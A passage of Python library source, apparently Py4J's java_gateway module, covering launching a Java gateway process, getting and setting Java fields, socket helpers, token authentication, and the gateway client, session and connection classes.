The sender is the CallbackServer instance.
"""
pre_server_shutdown = Signal()
"""Signal sent when a Python (Callback) Server is about to shut down.
Will supply the ``server`` argument, an instance of CallbackServer
The sender is the CallbackServer instance.
"""
post_server_shutdown = Signal()
"""Signal sent when a Python (Callback) Server is shutted down.
Will supply the ``server`` argument, an instance of CallbackServer
The sender is the CallbackServer instance.
"""
def get_create_new_process_group_kwargs():
"""Ensures that the child process is created in another process group.
This prevents signals such as SIGINT from propagating to the JVM.
"""
if os.name != "nt":
kwargs = {"preexec_fn": os.setpgrp}
else:
kwargs = {"creationflags": subprocess.CREATE_NEW_PROCESS_GROUP}
return kwargs
def set_reuse_address(server_socket):
"""Sets reuse address option if not on windows.
On windows, the SO_REUSEADDR option means that multiple server sockets can
be bound to the same address (it has nothing to do with TIME_WAIT).
"""
if os.name != "nt":
server_socket.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
def set_default_callback_accept_timeout(accept_timeout):
"""Sets default accept timeout of callback server.
"""
deprecated("set_default_callback_accept_timeout", "1.0",
"CallbackServerParameters")
global DEFAULT_CALLBACK_SERVER_ACCEPT_TIMEOUT
DEFAULT_CALLBACK_SERVER_ACCEPT_TIMEOUT = accept_timeout
def deprecated(name, last_version, use_instead="", level=logging.DEBUG,
raise_exc=False):
if not use_instead:
msg = "{0} is deprecated and will be removed in version {1}"\
.format(name, last_version)
else:
msg = "{0} is deprecated and will be removed in version {1}. "\
"Use {2} instead."\
.format(name, last_version, use_instead)
logger.log(level, msg)
if raise_exc:
raise DeprecationWarning(msg)
def java_import(jvm_view, import_str):
"""Imports the package or class specified by `import_str` in the
jvm view namespace.
:param jvm_view: The jvm_view in which to import a class/package.
    :param import_str: The class (e.g., java.util.List) or the package
(e.g., java.io.*) to import
"""
gateway_client = jvm_view._gateway_client
command = proto.JVMVIEW_COMMAND_NAME + proto.JVM_IMPORT_SUB_COMMAND_NAME +\
jvm_view._id + "\n" + escape_new_line(import_str) + "\n" +\
proto.END_COMMAND_PART
answer = gateway_client.send_command(command)
return_value = get_return_value(answer, gateway_client, None, None)
return return_value
def find_jar_path():
"""Tries to find the path where the py4j jar is located.
"""
paths = []
jar_file = "py4j{0}.jar".format(__version__)
maven_jar_file = "py4j-{0}.jar".format(__version__)
paths.append(jar_file)
# ant
paths.append(os.path.join(os.path.dirname(
os.path.realpath(__file__)), "../../../py4j-java/" + jar_file))
# with gradle 5, and renaming the jar to the standard "py4j-__version__.jar"
paths.append(os.path.join(os.path.dirname(
os.path.realpath(__file__)), "../../../py4j-java/" + maven_jar_file))
# maven
paths.append(os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"../../../py4j-java/target/" + maven_jar_file))
paths.append(os.path.join(os.path.dirname(
os.path.realpath(__file__)), "../share/py4j/" + jar_file))
paths.append("../../../current-release/" + jar_file)
paths.append(os.path.join(sys.prefix, "share/py4j/" + jar_file))
    # pip install py4j # On Ubuntu 16.04, where virtualenvpath=/usr/local
# this file is here:
# virtualenvpath/lib/pythonX/dist-packages/py4j/java_gateway.py
# the jar file is here: virtualenvpath/share/py4j/py4j.jar
    # pip install --user py4j # On Ubuntu 16.04, where virtualenvpath=~/.local
# this file is here:
# virtualenvpath/lib/pythonX/site-packages/py4j/java_gateway.py
# the jar file is here: virtualenvpath/share/py4j/py4j.jar
paths.append(os.path.join(os.path.dirname(
os.path.realpath(__file__)), "../../../../share/py4j/" + jar_file))
for path in paths:
if os.path.exists(path):
return path
return ""
def launch_gateway(port=0, jarpath="", classpath="", javaopts=[],
die_on_exit=False, redirect_stdout=None,
redirect_stderr=None, daemonize_redirect=True,
java_path="java", create_new_process_group=False,
enable_auth=False):
"""Launch a `Gateway` in a new Java process.
The redirect parameters accept file-like objects, Queue, or deque. When
text lines are sent to the stdout or stderr of the child JVM, these lines
are redirected to the file-like object (``write(line)``), the Queue
(``put(line)``), or the deque (``appendleft(line)``).
The text line will contain a newline character.
Only text output is accepted on stdout and stderr. If you wish to
communicate with the child JVM through bytes, you need to create your own
helper function.
:param port: the port to launch the Java Gateway on. If no port is
specified then an ephemeral port is used.
:param jarpath: the path to the Py4J jar. Only necessary if the jar
was installed at a non-standard location or if Python is using
a different `sys.prefix` than the one that Py4J was installed
under.
:param classpath: the classpath used to launch the Java Gateway.
:param javaopts: an array of extra options to pass to Java (the classpath
should be specified using the `classpath` parameter, not `javaopts`.)
:param die_on_exit: if `True`, the Java gateway process will die when
this Python process exits or is killed.
:param redirect_stdout: where to redirect the JVM stdout. If None (default)
stdout is redirected to os.devnull. Otherwise accepts a
file descriptor, a queue, or a deque. Will send one line at a time
to these objects.
    :param redirect_stderr: where to redirect the JVM stderr. If None (default)
stderr is redirected to os.devnull. Otherwise accepts a
file descriptor, a queue, or a deque. Will send one line at a time to
these objects.
:param daemonize_redirect: if True, the consumer threads will be daemonized
and will not prevent the main Python process from exiting. This means
the file descriptors (stderr, stdout, redirect_stderr, redirect_stdout)
might not be properly closed. This is not usually a problem, but in
case of errors related to file descriptors, set this flag to False.
:param java_path: If None, Py4J will use $JAVA_HOME/bin/java if $JAVA_HOME
is defined, otherwise it will use "java".
:param create_new_process_group: If True, the JVM is started in a new
process group. This ensures that signals sent to the parent Python
process are not forwarded to the JVM. For example, sending
Ctrl-C/SIGINT won't interrupt the JVM. If the python process dies, the
Java process will stay alive, which may be a problem for some scenarios
though.
:param enable_auth: If True, the server will require clients to provide an
authentication token when connecting.
:rtype: the port number of the `Gateway` server or, when auth enabled,
a 2-tuple with the port number and the auth token.
"""
popen_kwargs = {}
if not jarpath:
jarpath = find_jar_path()
if not java_path:
java_home = os.environ.get("JAVA_HOME")
if java_home:
java_path = os.path.join(java_home, "bin", "java")
else:
java_path = "java"
# Fail if the jar does not exist.
if not os.path.exists(jarpath):
raise Py4JError("Could not find py4j jar at {0}".format(jarpath))
# Launch the server in a subprocess.
classpath = os.pathsep.join((jarpath, classpath))
command = [java_path, "-classpath", classpath] + javaopts + \
["py4j.GatewayServer"]
if die_on_exit:
command.append("--die-on-broken-pipe")
if enable_auth:
command.append("--enable-auth")
command.append(str(port))
logger.debug("Launching gateway with command {0}".format(command))
# stderr redirection
close_stderr = False
if redirect_stderr is None:
stderr = open(os.devnull, "w")
close_stderr = True
elif isinstance(redirect_stderr, Queue) or\
isinstance(redirect_stderr, deque):
stderr = PIPE
else:
stderr = redirect_stderr
# we don't need this anymore
redirect_stderr = None
# stdout redirection
if redirect_stdout is None:
redirect_stdout = open(os.devnull, "w")
if create_new_process_group:
popen_kwargs.update(get_create_new_process_group_kwargs())
proc = Popen(command, stdout=PIPE, stdin=PIPE, stderr=stderr,
**popen_kwargs)
# Determine which port the server started on (needed to support
# ephemeral ports)
_port = int(proc.stdout.readline())
# Read the auth token from the server if enabled.
_auth_token = None
if enable_auth:
_auth_token = proc.stdout.readline()[:-1]
    # Start consumer threads so the process does not deadlock/hang
OutputConsumer(
redirect_stdout, proc.stdout, daemon=daemonize_redirect).start()
if redirect_stderr is not None:
OutputConsumer(
redirect_stderr, proc.stderr, daemon=daemonize_redirect).start()
ProcessConsumer(proc, [redirect_stdout], daemon=daemonize_redirect).start()
if close_stderr:
# XXX This will quiet ResourceWarning in Python 3.5+
        # This only closes the fd in this process, not in the JVM process, which
# makes sense.
quiet_close(stderr)
if enable_auth:
return (_port, _auth_token)
else:
return _port
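# Minimal usage sketch (JavaGateway is defined later in this module; the
# calls shown are standard Py4J usage, given here only as an illustration):
#   port = launch_gateway(die_on_exit=True)
#   gateway = JavaGateway(gateway_parameters=GatewayParameters(port=port))
#   gateway.jvm.java.lang.System.currentTimeMillis()
#   gateway.shutdown()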
def get_field(java_object, field_name):
"""Retrieves the field named `field_name` from the `java_object`.
This function is useful when `auto_field=false` in a gateway or
Java object.
:param java_object: the instance containing the field
:param field_name: the name of the field to retrieve
"""
command = proto.FIELD_COMMAND_NAME + proto.FIELD_GET_SUBCOMMAND_NAME +\
java_object._target_id + "\n" + field_name + "\n" +\
proto.END_COMMAND_PART
answer = java_object._gateway_client.send_command(command)
has_error, error_message = get_error_message(answer)
if answer == proto.NO_MEMBER_COMMAND or has_error:
message = compute_exception_message(
"no field {0} in object {1}".format(
field_name, java_object._target_id), error_message)
raise Py4JError(message)
else:
return get_return_value(
answer, java_object._gateway_client, java_object._target_id,
field_name)
def set_field(java_object, field_name, value):
"""Sets the field named `field_name` of `java_object` to `value`.
This function is the only way to set a field because the assignment
operator in Python cannot be overloaded.
:param java_object: the instance containing the field
:param field_name: the name of the field to set
:param value: the value to assign to the field
"""
command_part = get_command_part(
value,
java_object._gateway_client.gateway_property.pool)
command = proto.FIELD_COMMAND_NAME + proto.FIELD_SET_SUBCOMMAND_NAME +\
java_object._target_id + "\n" + field_name + "\n" +\
command_part + proto.END_COMMAND_PART
answer = java_object._gateway_client.send_command(command)
has_error, error_message = get_error_message(answer)
if answer == proto.NO_MEMBER_COMMAND or has_error:
message = compute_exception_message(
"no field {0} in object {1}".format(
field_name, java_object._target_id), error_message)
raise Py4JError(message)
return get_return_value(
answer, java_object._gateway_client, java_object._target_id,
field_name)
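# Sketch (illustrative; assumes `obj` is a JavaObject whose class exposes a
# public int field named `counter`):
#   value = get_field(obj, "counter")
#   set_field(obj, "counter", value + 1)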
def get_method(java_object, method_name):
"""Retrieves a reference to the method of an object.
This function is useful when `auto_field=true` and an instance field has
the same name as a method. The full signature of the method is not
required: it is determined when the method is called.
:param java_object: the instance containing the method
:param method_name: the name of the method to retrieve
"""
return JavaMember(
method_name, java_object, java_object._target_id,
java_object._gateway_client)
def is_instance_of(gateway, java_object, java_class):
"""Indicates whether a java object is an instance of the provided
java_class.
:param gateway: the JavaGateway instance
:param java_object: the JavaObject instance
:param java_class: can be a string (fully qualified name), a JavaClass
        instance, or a JavaObject instance
"""
if isinstance(java_class, basestring):
param = java_class
elif isinstance(java_class, JavaClass):
param = java_class._fqn
elif isinstance(java_class, JavaObject):
param = java_class.getClass()
else:
raise Py4JError(
"java_class must be a string, a JavaClass, or a JavaObject")
return gateway.jvm.py4j.reflection.TypeUtil.isInstanceOf(
param, java_object)
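# Sketch (illustrative; assumes `gateway` is a connected JavaGateway):
#   lst = gateway.jvm.java.util.ArrayList()
#   is_instance_of(gateway, lst, "java.util.List")            # -> True
#   is_instance_of(gateway, lst, gateway.jvm.java.util.Map)   # -> False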
def get_java_class(java_class):
"""Returns the java.lang.Class of a JavaClass. This is equivalent to
calling .class in Java.
:param java_class: An instance of JavaClass
:rtype: An instance of JavaObject that corresponds to a java.lang.Class
"""
return java_class._java_lang_class
def quiet_close(closable):
"""Quietly closes a closable object without throwing an exception.
:param closable: Object with a ``close`` method.
"""
if closable is None:
        # Do not attempt to close None; doing so would log unnecessary exceptions.
return
try:
closable.close()
except Exception:
logger.debug("Exception while closing", exc_info=True)
def quiet_shutdown(socket_instance):
"""Quietly shuts down a socket without throwing an exception.
:param socket_instance: Socket with ``shutdown`` method.
"""
if socket_instance is None:
        # Do not attempt to close None; doing so would log unnecessary exceptions.
return
try:
socket_instance.shutdown(socket.SHUT_RDWR)
except Exception:
logger.debug("Exception while shutting down a socket", exc_info=True)
def set_linger(a_socket):
"""Sets SO_LINGER to true, 0 to send a RST packet. This forcibly closes the
connection and the remote socket should fail on write and should not need
to read to realize that the socket was closed.
Only use on timeout and maybe shutdown because it does not terminate the
TCP connection normally.
"""
l_onoff = 1
l_linger = 0
a_socket.setsockopt(
socket.SOL_SOCKET, socket.SO_LINGER,
struct.pack(b'ii', l_onoff, l_linger))
def check_connection(a_socket, read_timeout):
"""Checks that a socket is ready to receive by reading from it.
If the read times out, this is a good sign. If the read returns an
empty string, this usually means that the socket was remotely closed.
:param a_socket: The socket to read from.
:param read_timeout: The read_timeout to restore the socket to.
"""
a_socket.settimeout(0.0001)
response = 0
try:
response = a_socket.recv(2)
except socket.timeout:
# Do nothing this is expected!
pass
finally:
a_socket.settimeout(read_timeout)
if response == b"":
raise Exception("The connection was remotely closed.")
def gateway_help(gateway_client, var, pattern=None, short_name=True,
display=True):
"""Displays a help page about a class or an object.
    :param gateway_client: The gateway client
:param var: JavaObject, JavaClass or JavaMember for which a help page
will be generated.
:param pattern: Star-pattern used to filter the members. For example
"get*Foo" may return getMyFoo, getFoo, getFooBar, but not bargetFoo.
The pattern is matched against the entire signature. To match only
the name of a method, use "methodName(*".
:param short_name: If True, only the simple name of the parameter
types and return types will be displayed. If False, the fully
qualified name of the types will be displayed.
:param display: If True, the help page is displayed in an interactive
page similar to the `help` command in Python. If False, the page is
returned as a string.
"""
if hasattr2(var, "_get_object_id"):
command = proto.HELP_COMMAND_NAME +\
proto.HELP_OBJECT_SUBCOMMAND_NAME +\
var._get_object_id() + "\n" +\
get_command_part(pattern) +\
get_command_part(short_name) +\
proto.END_COMMAND_PART
answer = gateway_client.send_command(command)
elif hasattr2(var, "_fqn"):
command = proto.HELP_COMMAND_NAME +\
proto.HELP_CLASS_SUBCOMMAND_NAME +\
var._fqn + "\n" +\
get_command_part(pattern) +\
get_command_part(short_name) +\
proto.END_COMMAND_PART
answer = gateway_client.send_command(command)
elif hasattr2(var, "container") and hasattr2(var, "name"):
if pattern is not None:
raise Py4JError("pattern should be None with var is a JavaMember")
pattern = var.name + "(*"
var = var.container
return gateway_help(
gateway_client, var, pattern, short_name=short_name,
display=display)
else:
        raise Py4JError(
            "var is not a JavaObject, JavaClass, or JavaMember")
help_page = get_return_value(answer, gateway_client, None, None)
if (display):
pager(help_page)
else:
return help_page
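# Sketch (illustrative; assumes `obj` is a JavaObject): fetch the help page
# as a string instead of paging it, keeping only methods named get*:
#   page = gateway_help(obj._gateway_client, obj, pattern="get*(*",
#                       display=False)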
def do_client_auth(command, input_stream, sock, auth_token):
"""Receives and decodes a auth token.
- If the token does not match, an exception is raised.
- If the command received is not an Auth command, an exception is raised.
- If an exception occurs, it is wrapped in a Py4JAuthenticationError.
- Otherwise, it returns True.
"""
try:
if command != proto.AUTH_COMMAND_NAME:
raise Py4JAuthenticationError("Expected {}, received {}.".format(
proto.AUTH_COMMAND_NAME, command))
client_token = smart_decode(input_stream.readline()[:-1])
# Remove the END marker
input_stream.readline()
if auth_token == client_token:
success = proto.OUTPUT_VOID_COMMAND.encode("utf-8")
sock.sendall(success)
else:
error = proto.ERROR_RETURN_MESSAGE.encode("utf-8")
# TODO AUTH Send error message with the error?
sock.sendall(error)
raise Py4JAuthenticationError("Client authentication failed.")
except Py4JAuthenticationError:
raise
except Exception as e:
logger.exception(
"An exception occurred while trying to authenticate "
"a connection")
raise Py4JAuthenticationError(cause=e)
return True
def _garbage_collect_object(gateway_client, target_id):
try:
try:
ThreadSafeFinalizer.remove_finalizer(
smart_decode(gateway_client.address) +
smart_decode(gateway_client.port) +
target_id)
gateway_client.garbage_collect_object(target_id)
except Exception:
logger.debug(
"Exception while garbage collecting an object",
exc_info=True)
except Exception:
# Maybe logger is dead at this point.
pass
def _garbage_collect_connection(socket_instance):
"""Closes the socket if auto_delete is True and the socket is opened.
This is an acceptable practice if you know that your Python VM implements
garbage collection and closing sockets immediately is not a concern.
Otherwise, it is always better (because it is predictable) to explicitly
close the socket by calling `GatewayConnection.close()`.
"""
try:
if socket_instance is not None:
quiet_shutdown(socket_instance)
quiet_close(socket_instance)
except Exception:
# Maybe logger used by quiet_* is dead at this point
pass
def _garbage_collect_proxy(pool, proxy_id):
"""Removes a proxy from the pool of python proxies.
Do not remove special proxies such as the entry point.
Note: even though this function starts with _garbage_collect,
    it is not called within a weakref lambda. This is only a private function.
"""
success = False
if proxy_id != proto.ENTRY_POINT_OBJECT_ID:
try:
            del pool[proxy_id]
success = True
except KeyError:
logger.warning(
"Tried to garbage collect non existing python proxy {0}"
.format(proxy_id))
return success
class OutputConsumer(CompatThread):
"""Thread that consumes output
"""
def __init__(self, redirect, stream, *args, **kwargs):
super(OutputConsumer, self).__init__(*args, **kwargs)
self.redirect = redirect
self.stream = stream
if isinstance(redirect, Queue):
self.redirect_func = self._pipe_queue
if isinstance(redirect, deque):
self.redirect_func = self._pipe_deque
if hasattr2(redirect, "write"):
self.redirect_func = self._pipe_fd
def _pipe_queue(self, line):
self.redirect.put(line)
def _pipe_deque(self, line):
self.redirect.appendleft(line)
def _pipe_fd(self, line):
self.redirect.write(line)
def run(self):
lines_iterator = iter(self.stream.readline, b"")
for line in lines_iterator:
self.redirect_func(smart_decode(line))
class ProcessConsumer(CompatThread):
"""Thread that ensures process stdout and stderr are properly closed.
"""
def __init__(self, proc, closable_list, *args, **kwargs):
super(ProcessConsumer, self).__init__(*args, **kwargs)
self.proc = proc
if closable_list:
# We don't care if it contains queues or deques, quiet_close will
# just ignore them.
self.closable_list = closable_list
else:
self.closable_list = []
def run(self):
self.proc.wait()
quiet_close(self.proc.stdout)
quiet_close(self.proc.stderr)
for closable in self.closable_list:
quiet_close(closable)
class GatewayParameters(object):
"""Wrapper class that contains all parameters that can be passed to
configure a `JavaGateway`
"""
def __init__(
self, address=DEFAULT_ADDRESS, port=DEFAULT_PORT, auto_field=False,
auto_close=True, auto_convert=False, eager_load=False,
ssl_context=None, enable_memory_management=True,
read_timeout=None, auth_token=None):
"""
:param address: the address to which the client will request a
            connection. If you're passing an `SSLContext` with
`check_hostname=True` then this address must match
(one of) the hostname(s) in the certificate the gateway
server presents.
:param port: the port to which the client will request a connection.
Default is 25333.
:param auto_field: if `False`, each object accessed through this
gateway won"t try to lookup fields (they will be accessible only by
calling get_field). If `True`, fields will be automatically looked
up, possibly hiding methods of the same name and making method
calls less efficient.
:param auto_close: if `True`, the connections created by the client
close the socket when they are garbage collected.
:param auto_convert: if `True`, try to automatically convert Python
objects like sequences and maps to Java Objects. Default value is
`False` to improve performance and because it is still possible to
explicitly perform this conversion.
:param eager_load: if `True`, the gateway tries to connect to the JVM
by calling System.currentTimeMillis. If the gateway cannot connect
to the JVM, it shuts down itself and raises an exception.
:param ssl_context: if not None, SSL connections will be made using
this SSLContext
:param enable_memory_management: if True, tells the Java side when a
JavaObject (reference to an object on the Java side) is garbage
collected on the Python side.
:param read_timeout: if > 0, sets a timeout in seconds after
which the socket stops waiting for a response from the Java side.
        :param auth_token: if provided, an authentication token that clients
must provide to the server when connecting.
"""
self.address = address
self.port = port
self.auto_field = auto_field
self.auto_close = auto_close
self.auto_convert = auto_convert
self.eager_load = eager_load
self.ssl_context = ssl_context
self.enable_memory_management = enable_memory_management
self.read_timeout = read_timeout
self.auth_token = escape_new_line(auth_token)
class CallbackServerParameters(object):
"""Wrapper class that contains all parameters that can be passed to
configure a `CallbackServer`
"""
def __init__(
self, address=DEFAULT_ADDRESS, port=DEFAULT_PYTHON_PROXY_PORT,
daemonize=False, daemonize_connections=False, eager_load=True,
ssl_context=None,
accept_timeout=DEFAULT_ACCEPT_TIMEOUT_PLACEHOLDER,
read_timeout=None, propagate_java_exceptions=False,
auth_token=None):
"""
:param address: the address to which the client will request a
connection
:param port: the port to which the client will request a connection.
            Default is 25334.
:param daemonize: If `True`, will set the daemon property of the server
thread to True. The callback server will exit automatically if all
the other threads exit.
:param daemonize_connections: If `True`, callback server connections
are executed in daemonized threads and will not block the exit of a
program if non daemonized threads are finished.
:param eager_load: If `True`, the callback server is automatically
started when the JavaGateway is created.
:param ssl_context: if not None, the SSLContext's certificate will be
presented to callback connections.
:param accept_timeout: if > 0, sets a timeout in seconds after which
the callbackserver stops waiting for a connection, sees if the
callback server should shut down, and if not, wait again for a
connection. The default is 5 seconds: this roughly means that
            it can take up to 5 seconds to shut down the callback server.
:param read_timeout: if > 0, sets a timeout in seconds after
which the socket stops waiting for a call or command from the
Java side.
:param propagate_java_exceptions: if `True`, any `Py4JJavaError` raised
by a Python callback will cause the nested `java_exception` to be
thrown on the Java side. If `False`, the `Py4JJavaError` will
manifest as a `Py4JException` on the Java side, just as with any
other kind of Python exception. Setting this option is useful if
you need to implement a Java interface where the user of the
interface has special handling for specific Java exception types.
:param auth_token: if provided, an authentication token that clients
must provide to the server when connecting.
"""
self.address = address
self.port = port
self.daemonize = daemonize
self.daemonize_connections = daemonize_connections
self.eager_load = eager_load
self.ssl_context = ssl_context
if accept_timeout == DEFAULT_ACCEPT_TIMEOUT_PLACEHOLDER:
# This is to support deprecated function call...
# TODO Remove "DEFAULT" once we remove the deprecated function
# call.
accept_timeout = DEFAULT_CALLBACK_SERVER_ACCEPT_TIMEOUT
self.accept_timeout = accept_timeout
self.read_timeout = read_timeout
self.propagate_java_exceptions = propagate_java_exceptions
self.auth_token = escape_new_line(auth_token)
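# Sketch (illustrative): typical parameter objects for a gateway that also
# accepts Java-to-Python callbacks (the values shown are not the defaults):
#   gp = GatewayParameters(auto_convert=True, read_timeout=10)
#   cbp = CallbackServerParameters(daemonize=True, daemonize_connections=True)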
class DummyRLock(object):
def __init__(self):
pass
def acquire(self, blocking=1):
pass
def release(self):
pass
def __enter__(self):
pass
def __exit__(self, type, value, tb):
pass
class GatewayConnectionGuard(object):
def __init__(self, client, connection):
self._client = client
self._connection = connection
def __enter__(self):
return self
def read(self, hint=-1):
return self._connection.stream.read(hint)
def __exit__(self, type, value, traceback):
if value is None:
self._client._give_back_connection(self._connection)
else:
self._connection.close()
class GatewayClient(object):
"""Responsible for managing connections to the JavaGateway.
This implementation is thread-safe and connections are created on-demand.
This means that Py4J-Python can be accessed by multiple threads and
messages are sent to and processed concurrently by the Java Gateway.
When creating a custom :class:`JavaGateway`, it is recommended to pass an
instance of :class:`GatewayClient` instead of a :class:`GatewayConnection`:
both have the same interface, but the client supports multiple threads and
connections, which is essential when using callbacks. """
def __init__(
self, address=DEFAULT_ADDRESS, port=DEFAULT_PORT,
auto_close=True, gateway_property=None,
ssl_context=None, gateway_parameters=None):
"""
:param gateway_parameters: the set of parameters used to configure the
GatewayClient.
:param gateway_property: used to keep gateway preferences without a
cycle with the gateway
"""
if address != DEFAULT_ADDRESS:
deprecated("GatewayClient.address", "1.0", "GatewayParameters")
if port != DEFAULT_PORT:
deprecated("GatewayClient.port", "1.0", "GatewayParameters")
if not gateway_parameters:
gateway_parameters = GatewayParameters(
address=address, port=port, auto_close=auto_close,
ssl_context=ssl_context)
self.gateway_parameters = gateway_parameters
self.address = gateway_parameters.address
self.port = gateway_parameters.port
self.is_connected = True
self.auto_close = gateway_parameters.auto_close
self.gateway_property = gateway_property
self.ssl_context = gateway_parameters.ssl_context
self.deque = deque()
def garbage_collect_object(self, target_id):
"""Tells the Java side that there is no longer a reference to this
JavaObject on the Python side.
"""
if target_id != proto.ENTRY_POINT_OBJECT_ID and\
target_id != proto.GATEWAY_SERVER_OBJECT_ID and\
self.is_connected:
try:
self.send_command(
proto.MEMORY_COMMAND_NAME +
proto.MEMORY_DEL_SUBCOMMAND_NAME +
target_id +
"\ne\n")
except Exception:
logger.debug("Exception while garbage collecting an object",
exc_info=True)
def _get_connection(self):
if not self.is_connected:
raise Py4JNetworkError("Gateway is not connected.")
try:
connection = self.deque.pop()
except IndexError:
connection = self._create_connection()
return connection
def _create_connection(self):
connection = GatewayConnection(
self.gateway_parameters, self.gateway_property)
connection.start()
return connection
def _give_back_connection(self, connection):
try:
self.deque.append(connection)
except Exception:
logger.warning(
"Exception while giving back connection", exc_info=True)
def shutdown_gateway(self):
"""Sends a shutdown command to the gateway. This will close the
gateway server: all active connections will be closed. This may
be useful if the lifecycle of the Java program must be tied to
the Python program.
"""
logger.info("Shutdown gateway at "+str(self.address)+":"+str(self.port))
connection = self._get_connection()
try:
connection.shutdown_gateway()
self.close()
self.is_connected = False
except Py4JNetworkError:
logger.debug("Error while shutting down gateway.", exc_info=True)
self.shutdown_gateway()
def send_command(self, command, retry=True, binary=False):
"""Sends a command to the JVM. This method is not intended to be
called directly by Py4J users. It is usually called by
:class:`JavaMember` instances.
:param command: the `string` command to send to the JVM. The command
must follow the Py4J protocol.
:param retry: if `True`, the GatewayClient tries to resend a message
if it fails.
:param binary: if `True`, we won't wait for a Py4J-protocol response
from the other end; we'll just return the raw connection to the
caller. The caller becomes the owner of the connection, and is
            responsible for closing the connection (or returning it to this
`GatewayClient` pool using `_give_back_connection`).
:rtype: the `string` answer received from the JVM (The answer follows
the Py4J protocol). The guarded `GatewayConnection` is also returned
if `binary` is `True`.
"""
connection = self._get_connection()
try:
response = connection.send_command(command)
if binary:
return response, self._create_connection_guard(connection)
elif is_fatal_error(response):
connection.close(False)
else:
self._give_back_connection(connection)
except Py4JNetworkError as pne:
if connection:
reset = False
if isinstance(pne.cause, socket.timeout):
reset = True
connection.close(reset)
if self._should_retry(retry, connection, pne):
logging.info("Exception while sending command.", exc_info=True)
response = self.send_command(command, binary=binary)
else:
                logger.exception(
                    "Exception while sending command.")
response = proto.ERROR
return response
def _create_connection_guard(self, connection):
return GatewayConnectionGuard(self, connection)
def _should_retry(self, retry, connection, pne=None):
return pne and pne.when == proto.ERROR_ON_SEND
def close(self):
"""Closes all currently opened connections.
This operation is not thread safe and is only a best effort strategy
to close active connections.
All connections are guaranteed to be closed only if no other thread
is accessing the client and no call is pending.
"""
size = len(self.deque)
for _ in range(0, size):
try:
connection = self.deque.pop()
quiet_close(connection)
except IndexError:
pass
def build_info(self):
gw_info = dict()
gw_info['object'] = str(self)
gw_info['nConnections'] = len(self.deque)
gw_info['readTimeout'] = self.gateway_parameters.read_timeout
connections = []
for connection in list(self.deque):
connection_info = dict()
connection_info['socket'] = id(connection.socket)
connection_info['isConnected'] = connection.is_connected
connections.append(connection_info)
gw_info['connections'] = connections
return gw_info
@classmethod
def build_new_session(cls, address, port, gateway_client, pool):
""" Build a new session, using the parameters of the given gateway_client.
We also copy objects from the given pool."""
        # Reuse the configuration of the given gateway_client for the
        # new session's client.
auto_field = gateway_client.gateway_parameters.auto_field
auto_close = gateway_client.gateway_parameters.auto_close
auto_convert = gateway_client.gateway_parameters.auto_convert
eager_load = gateway_client.gateway_parameters.eager_load
ssl_context = gateway_client.gateway_parameters.ssl_context
enable_memory_management = gateway_client.gateway_parameters.enable_memory_management
read_timeout = gateway_client.gateway_parameters.read_timeout
auth_token = gateway_client.gateway_parameters.auth_token
gateway_parameters = GatewayParameters(
address=address, port=port,
auto_field=auto_field, auto_close=auto_close,
auto_convert=auto_convert, eager_load=eager_load,
ssl_context=ssl_context, enable_memory_management=enable_memory_management,
read_timeout=read_timeout, auth_token=auth_token)
# I build a new pool, with the entry point and a new jvm
gateway_property = JavaGateway.create_gateway_property(
gateway_parameters,
python_server_entry_point=None)
# take the entry point from the callback server pool
gateway_property.pool.put(pool[proto.ENTRY_POINT_OBJECT_ID], proto.ENTRY_POINT_OBJECT_ID)
# and this is our new pool
new_pool = gateway_property.pool
# ok create new client, with the input converters
new_gateway_client = JavaGateway.create_gateway_client(gateway_parameters,
gateway_property=gateway_property)
JavaGateway.setup_gateway_client(new_gateway_client)
# add the jvm to the gateway_client
jvm = JavaGateway.make_new_jvm_view(new_gateway_client,
name="JVM:"+str(address)+":"+str(port),
id=proto.DEFAULT_JVM_ID)
return GatewaySession(new_gateway_client, new_pool, jvm)
class GatewaySession(object):
def __init__(self, gw_client, pool, jvm):
self.gateway_client = gw_client
self.pool = pool
self.jvm = jvm
def address(self):
return self.gateway_client.address
def port(self):
return self.gateway_client.port
def close(self):
self.gateway_client.close()
def build_info(self):
return {
'address': self.gateway_client.address,
'port': self.gateway_client.port,
'gatewayClient': str(self.gateway_client),
'pool': str(self.pool),
'objects': self.pool.build_objects_info(),
'jvm': str(self.jvm)
}
class GatewaySessionPool(object):
""" A pool of active sessions, one per remote machine:port
I think GatewayClient should be named GatewaySession """
def __init__(self):
self.lock = RLock()
self.sessions = dict()
def put(self, gateway_session):
id = self.compute_id(gateway_session)
        with self.lock:
            existing = self.sessions.get(id)
            if existing is not None and existing is not gateway_session:
                existing.close()
            self.sessions[id] = gateway_session
@classmethod
def compute_id(cls, gateway_session):
return cls.id_for(gateway_session.address(), gateway_session.port())
@classmethod
def id_for(cls, address, port):
return str(address)+":"+str(port)
def keys(self):
with self.lock:
return self.sessions.keys()
def __getitem__(self, key):
with self.lock:
return self.sessions[key]
def __delitem__(self, key):
with self.lock:
            del self.sessions[key]
def __contains__(self, id):
return id in self.sessions
def __len__(self):
with self.lock:
return len(self.sessions)
def build_info(self):
info = dict()
info['nSessions'] = len(self.sessions)
info['sessions'] = []
for _id, session in self.sessions.items():
info['sessions'].append(session.build_info())
return info
class GatewayConnection(object):
"""Default gateway connection (socket based) responsible for communicating
with the Java Virtual Machine."""
def __init__(self, gateway_parameters, gateway_property=None):
"""
:param gateway_parameters: the set of parameters used to configure the
GatewayClient.
:param gateway_property: contains gateway preferences to avoid a cycle
with gateway
"""
self.gateway_parameters = gateway_parameters
self.address = gateway_parameters.address
self.port = gateway_parameters.port
af_type = socket.getaddrinfo(self.address, self.port)[0][0]
self.socket = socket.socket(af_type, socket.SOCK_STREAM)
if gateway_parameters.read_timeout:
self.socket.settimeout(gateway_parameters.read_timeout)
if gateway_parameters.ssl_context:
self.socket = gateway_parameters.ssl_context.wrap_socket(
self.socket, server_hostname=self.address)
self.is_connected = False
self.auto_close = gateway_parameters.auto_close
self.gateway_property = gateway_property
self.wr = weakref.ref(
self,
lambda wr, socket_instance=self.socket:
_garbage_collect_connection and
_garbage_collect_connection(socket_instance))
def start(self):
"""Starts the connection by connecting to the `address` and the `port`
"""
try:
self.socket.connect((self.address, self.port))
self.stream = self.socket.makefile("rb")
self.is_connected = True
self._authenticate_connection()
except Py4JAuthenticationError:
logger.exception("Cannot authenticate with gateway server.")
raise
except Exception as e:
msg = "An error occurred while trying to connect to the Java "\
"server ({0}:{1})".format(self.address, self.port)
logger.info(msg)
logger.exception(msg)
raise Py4JNetworkError(msg, e)
def _authenticate_connection(self):
if self.gateway_parameters.auth_token:
